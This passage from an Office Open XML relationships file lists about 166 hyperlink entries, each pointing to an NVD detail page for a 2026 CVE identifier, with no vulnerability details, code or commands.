Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 